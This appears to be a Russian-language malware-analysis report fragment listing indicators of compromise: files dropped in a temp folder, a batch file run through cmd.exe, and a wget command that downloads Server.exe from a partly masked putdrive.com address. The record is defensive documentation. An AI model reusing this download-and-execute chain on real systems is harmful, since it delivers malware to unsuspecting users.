Техническая информация
- '%TEMP%\1.tmp\Server.exe' (загружен из сети Интернет)
- '%TEMP%\1.tmp\Server.exe'
- '%TEMP%\1.tmp\wget.exe' http://sr###.putdrive.com/putstorage/DownloadFileHash/9A48DD643A5A4A5QQWE2422384EWQS/Server.exe
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\2.bat" <Полный путь к файлу>"
- %TEMP%\1.tmp\Server.exe
- %TEMP%\1.tmp\wget.exe
- %TEMP%\1.tmp\2.bat
- %TEMP%\1.tmp\2.bat
- %TEMP%\1.tmp\wget.exe
- 'sr###.putdrive.com':80
- http://sr###.putdrive.com/putstorage/DownloadFileHash/9A48DD643A5A4A5QQWE2422384EWQS/Server.exe
- DNS ASK sr###.putdrive.com